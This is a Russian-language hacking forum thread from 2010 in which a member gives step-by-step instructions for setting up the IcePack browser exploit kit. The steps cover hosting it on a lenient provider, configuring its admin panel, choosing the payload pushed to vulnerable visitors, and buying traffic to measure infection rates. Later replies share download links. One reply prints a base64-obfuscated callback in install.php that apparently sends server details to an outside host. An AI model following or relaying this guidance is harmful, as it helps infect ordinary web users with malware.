HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.05.2010, 01:00
Duplet
Познающий
Регистрация: 26.05.2010
Сообщений: 68
С нами: 8402006

Репутация: 14
По умолчанию

IMAGE http://www.freelancejob.ru/upload/365/18460872676223.png

Обобщение

Спойлер
Эксплойт, эксплоит (англ. exploit, эксплуатировать) — это компьютерная программа, фрагмент программного кода или последовательность команд, использующие уязвимости в программном обеспечении и применяемые для проведения атаки на вычислительную систему. Целью атаки может быть как захват контроля над системой (повышение привилегий), так и нарушение её функционирования (DDoS-атака).

================================================== ================================================== =
А для чего же это надо?

Спойлер
Троян с сайта-наверное вы мои друзья слышали что ужастные хакеры грузят троян на сайт и с сайта рассылаю вирус!Но это они дулают через связку эксплоидов,у которых пробив под 50-70%,они естественно приватные и продаются очень дорого,а мы используем паблик,и пробив у него 10-30% это значит что из 1000 человек,которые зашли на сайт вирус скачают только 100-300 человек

Настраиваем связку
================================================== ==================================================
Итак для начала мы должны скачать саму связку по ссылке:

Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Скачали?Отлично теперь распаковываем все и заливаем к себе на сайт ,я вам советую хостинг под это дело phpnet.us отлично держится,у меня пока ни 1 сайт не закрыли,администрации ваобще ПО что вы там делаети...

Так уже почти всё,теперь ставим на все файлы права 777.После нам надо создать базу данных,мы идём ,создаём базу данных,как создали идём обратно и редактируем файл db:
IMAGE http://i020.radikal.ru/1005/6c/461cd3e0caca.gif

Я думаю как редактировать всем понятно?Если нет напишите в этой теме объясню как буду в сети.
Теперь нам надо выбрать логин и пароль для админки эксплоида,для этого идём в файл config и редактируем:

PHP highlight

Код:
Код:
"http://XAKEP.1gb.com/",-адрес вашего сайт,там будет вредностный скрипт 

'admin_name'=>"",-логин к вашей админке

'admin_pass'=>"",-пароль к админке

);

?>

всё сохраняем и идём на ссылку :
адрес вашего сайта/install.php и сохраняем все настройки)))
Все теперь мы заходим в админку по ссылке :ваш_сайт/admin/index.php? вводите логин и пароль и мы идём настраивать эксплоит.
Теперь мы идём в инструменты-настройка

Видим стройку "файл для загрузки",этот файл эксплоид будет грузить врагу если браузер уязвим,и если ваш враг зайдёт по ссылке ваш_сайт.phpnet.us...Теперь мы идём к торговцу и заказываем трафик и проверяем пробивную силу вашей связки эксплоитов:
================================================== ================================================== =
К примеру если 1000 трафика,ваша связка пробила 500,то пробивная сила 50%,но таких связок очень мало и стоят они очень дорого...

по 900-2000$,это не шутка.Всё я закончил...

:dj:
================================================== ================================================== =
Duplet
http://black-energy.ru/
 
Ответить с цитированием

  #2  
Старый 28.05.2010, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Неплохо было бы дополнить, что за связку ты выложил, какие браузеры пробивает?
 
Ответить с цитированием

  #3  
Старый 28.05.2010, 01:00
Duplet
Познающий
Регистрация: 26.05.2010
Сообщений: 68
С нами: 8402006

Репутация: 14
По умолчанию

IcePack сори забыл указать...
У кого еще есть связки если хотите выкладывайте в этой теме...
 
Ответить с цитированием

  #4  
Старый 29.08.2010, 01:00
FrostArtes
Новичок
Регистрация: 25.05.2010
Сообщений: 3
С нами: 8403385

Репутация: 0
По умолчанию

Кто может перезалить ?
 
Ответить с цитированием

  #5  
Старый 29.08.2010, 01:00
iGloomy
Участник форума
Регистрация: 12.06.2010
Сообщений: 123
С нами: 8377526

Репутация: 40
По умолчанию

Вот перезалил, этот icepack скачивал с этой темы.
 
Ответить с цитированием

  #6  
Старый 29.08.2010, 01:00
FrostArtes
Новичок
Регистрация: 25.05.2010
Сообщений: 3
С нами: 8403385

Репутация: 0
По умолчанию

WTF

code:

FrostArtes, вы не имеете прав для доступа к этой странице. Это может быть вызвано несколькими причинами:
Ваш аккаунт имеет недостаточно прав для доступа к этой странице. Вы пытаетесь редактировать чьё-то сообщение, использовать административные полномочия или прочие опции ограниченного доступа?
Вы пытаетесь написать сообщение, но ваш аккаунт отключён администрацией или ожидает активации.

Если ваш аккаунт ожидает активации, вам необходимо подождать некоторое время (обычно аккаунты активируются в течение 24 часов). Когда ваш аккаунт будет активирован, на ваш почтовый ящик придет уведомление.

Причем не 1 раз такое уже !

Залей на slil.ru пожалуйста
 
Ответить с цитированием

  #7  
Старый 29.08.2010, 01:00
iGloomy
Участник форума
Регистрация: 12.06.2010
Сообщений: 123
С нами: 8377526

Репутация: 40
По умолчанию

Цитата:

Сообщение от FrostArtes

WTF

незнаю, ща тогда куданить перезалью.

Добавлено через 1 минуту
http://slil.ru/29613197
 
Ответить с цитированием

  #8  
Старый 29.08.2010, 01:00
FrostArtes
Новичок
Регистрация: 25.05.2010
Сообщений: 3
С нами: 8403385

Репутация: 0
По умолчанию

Эх жаль,но файл никак не грузится с сайта ))
 
Ответить с цитированием

  #9  
Старый 29.08.2010, 01:00
iGloomy
Участник форума
Регистрация: 12.06.2010
Сообщений: 123
С нами: 8377526

Репутация: 40
По умолчанию

со слил не грузиться?
 
Ответить с цитированием

  #10  
Старый 04.02.2011, 01:00
MOV_EAX
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами: 8553206

Репутация: 5
По умолчанию

а что толку его качать тем кто не знает что внутри происходит

вот эти строки наверно указывают на перегон трафика самому хозяину связки.


file_get_contents('http://datings.1gb.in/c.php?host=' . $_SERVER['HTTP_HOST'] . '&root=' . $_SERVER['SCRIPT_FILENAME']);


а в зашифрованном виде это так ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kYXRpbmdzLjFnYi 5pbi9jLnBocD9ob3N0PScgLiAkX1NFUlZFUlsnSFRUUF9IT1NU J10gLiAnJnJvb3Q9JyAuICRfU0VSVkVSWydTQ1JJUFRfRklMRU 5BTUUnXSk7IA==
в файле install.php

предлагаю вместе обсудить как теперь создать новую таблицу базы чтоб она заработала ведь она раньше работала на хозяина связки

download

а скачать можно отсюда
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.